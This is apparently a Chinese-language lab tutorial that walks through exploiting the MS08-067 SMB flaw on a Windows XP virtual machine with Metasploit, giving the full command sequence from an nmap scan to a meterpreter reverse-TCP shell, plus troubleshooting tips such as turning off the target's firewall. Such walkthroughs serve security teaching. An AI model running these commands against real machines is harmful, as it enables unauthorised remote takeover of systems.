ms08_067漏洞滲透攻擊實踐

0x01 實驗環境

攻擊機:kali 2016

ip:192.168.26.151

靶機:Win XP SP3 英文版

ip:192.168.26.152

【攻擊機與靶機之間保證可以相互ping通】

0x02配置

1.利用nmap掃描目標ip,查看其開放端口。發現其開放了445端口,則可考慮利用ms08_067漏洞進行滲透

root@kali:~# nmap 192.168.26.152

2.啓動msfconsole

root@kali:~# msfconsole

3.搜索ms08_067模塊

msf > search ms08_067

4.使用模塊

msf > use exploit/windows/smb/ms08_067_netapi.zn

5.查看需要填寫的參數

msf exploit(ms08_067_netapi.zn) > show options 

6.設置目標主機ip

msf exploit(ms08_067_netapi.zn) > set rhost 192.168.26.152

7.配置payload,用於監聽返回會話的ip,並設置ip

msf exploit(ms08_067_netapi.zn) > set payload windows/meterpreter/reverse_tcp
msf exploit(ms08_067_netapi.zn) > set lhost 192.168.26.151

8.開始攻擊

msf exploit(ms08_067_netapi.zn) > exploit

【攻擊成功】

9.shell

10.執行cmd命令

0x03常見問題

1.如果出現攻擊機ping不通靶機,但靶機卻能ping通虛擬機的情況,可在xp開啓“允許傳入回顯請求”,或直接關閉防火牆。

2.WIN Server 2003同樣存在ms08_067漏洞,英文版可用同樣方法進行攻擊,但中文版需要在模塊配置文件中添加對應版本的代碼,具體操作詳見https://bbs.pediy.com/thread-186737.htm。但我多次嘗試,均以失敗告終,只能使用XP來進行測試。

 

 

 

 

發表評論
所有評論
還沒有人評論,想成為第一個評論的人麼? 請在上方評論欄輸入並且點擊發布.
相關文章